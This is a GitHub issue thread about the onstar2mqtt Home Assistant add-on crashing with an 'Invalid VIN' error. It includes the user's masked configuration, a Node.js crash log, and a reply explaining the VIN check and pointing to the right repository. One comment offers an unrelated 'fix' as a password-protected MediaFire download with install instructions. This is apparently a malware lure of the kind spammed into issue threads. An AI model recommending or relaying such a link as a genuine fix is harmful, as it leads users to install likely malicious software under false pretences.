### ISSUE TITLE
Invalid VIN

### ISSUE THREAD

**Issue by crigel** [michaelwoods/onstar2mqtt#387]
I am using the onstar2mqtt Home Assistant add-on. I'm trying to connect my 2019 Chevy Silverado. I know I am probably missing something and hoping someone can help me figure it out. Note, I currently use the mychevorlet app and have a connected plan that allows me to remotely start my truck, get diagnostics, tracking, etc.. I haven't been able to get as far as anything past the below configuration for the addon as it keeps crashing. Below is some additional information. Thank you in advance for any assistance anyone can provide

### HA Add-on:
Version: OnStar2MQTT Home Assistant Add-on (BigThunderSR) for Vehicle 1 / Current version: 1.18.8

### Home Assistant:
Core: 2024.8.3
Supervisor: 2024.08.0
Operating System: 13.1
Frontend: 20240809.0

### My configuration:
Vehicle Name: Silverado
OnStar Device ID:<concealed> 
OnStar VIN: 3***************5
OnStar User Name: c*************@gmail.com
OnStar Password: •••••••••••••••••
OnStar PIN: ••••
OnStar URL: https://api.gm.com
OnStar Refresh Period: 1800000
OnStar Poll Interval: 6
OnStar Poll Timeout: 90
MQTT Host: 192.168.XXX.XXX
MQTT Username: homeassistant
MQTT Password: ••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
MQTT Port: 1883
MQTT Prefix: homeassistant
MQTT OnSTAR Polling Status Topic: <blank>
MQTT List All Sensors Together: false
MQTT TLS: false
MQTT Reject Unauthorized: false
CA File: <blank>
Certificate File: <blank>
Key File: <blank>

### The Error:
s6-rc: info: service legacy-cont-init: starting
s6-rc: info: service legacy-cont-init successfully started
s6-rc: info: service legacy-services: starting
s6-rc: info: service legacy-services successfully started
[14:50:54] INFO: Starting OnStar2MQTT for Silverado...

> onstar2mqtt@1.18.8 start
> node src/index.js

/app/src/index.js:44
    throw new Error('Invalid VIN. Please check the value entered for VIN in ONSTAR_VIN.');
    ^

Error: Invalid VIN. Please check the value entered for VIN in ONSTAR_VIN.
    at Object.<anonymous> (/app/src/index.js:44:11)
    at Module._compile (node:internal/modules/cjs/loader:1364:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1422:10)
    at Module.load (node:internal/modules/cjs/loader:1203:32)
    at Module._load (node:internal/modules/cjs/loader:1019:12)
    at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:128:12)
    at node:internal/main/run_main_module:28:49

Node.js v18.20.1
s6-rc: info: service legacy-services: stopping
s6-rc: info: service legacy-services successfully stopped
s6-rc: info: service legacy-cont-init: stopping
s6-rc: info: service legacy-cont-init successfully stopped
s6-rc: info: service fix-attrs: stopping
s6-rc: info: service fix-attrs successfully stopped
s6-rc: info: service s6rc-oneshot-runner: stopping
s6-rc: info: service s6rc-oneshot-runner successfully stopped
s6-rc: info: service s6rc-oneshot-runner: starting
s6-rc: info: service s6rc-oneshot-runner successfully started
s6-rc: info: service fix-attrs: starting
s6-rc: info: service fix-attrs successfully started
s6-rc: info: service legacy-cont-init: starting
s6-rc: info: service legacy-cont-init successfully started
s6-rc: info: service legacy-services: starting
s6-rc: info: service legacy-services successfully started
[14:51:07] INFO: Starting OnStar2MQTT for Silverado...

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by crigel** [comment]
> @crigel, the error message tells you exactly what the issue is: "throw new Error('Invalid VIN. Please check the value entered for VIN in ONSTAR_VIN.');"
> 
> Please double check the VIN you entered in the config of the HA Add-on.
> 
> Also, you opened this issue in the wrong project. It should have been opened here instead: https://github.com/BigThunderSR/homeassistant-addons-onstar2mqtt

thank you for responding I will move this!
